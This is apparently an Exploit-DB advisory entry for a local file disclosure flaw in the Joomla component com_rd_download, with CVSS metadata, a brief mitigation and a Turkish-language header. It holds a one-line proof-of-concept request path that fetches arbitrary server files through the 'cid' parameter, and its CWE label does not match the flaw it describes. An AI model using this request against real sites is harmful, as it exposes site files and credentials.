Joomla Component com_rd_download Local File Disclosure Vulnerability

vendor:

com_rd_download

by:

FL0RiX

8.8

CVSS

HIGH

Local File Disclosure

434

CWE

Product Name: com_rd_download

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

Joomla Component com_rd_download Local File Disclosure Vulnerability

The vulnerability allows an attacker to download any file from the system by exploiting a lack of filtering of malicious characters in the com_rd_download component of Joomla.

Mitigation:

Filter malicious characters in the com_rd_download component of Joomla.

Source

Exploit-DB raw data:

<------------------- header data start ------------------- >

#############################################################
#        Joomla Component com_rd_download Local File Disclosure Vulnerability
#############################################################

# Author          :  FL0RiX

# Greez          : Deep-Power,PyskE,Ruzgarin_oglu And All Friends

# Name            : com_rd_download

# Bug Type        : Local File Disclosure

# Infection       : sistemden dosya çekilebilir

# Bug Fix Advice : zararl&#305; karakterler filtrelenmeli

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

path/index.php?option=com_rd_download&view=download&cid=[DOSYADI].php

< -- bug code end of -- >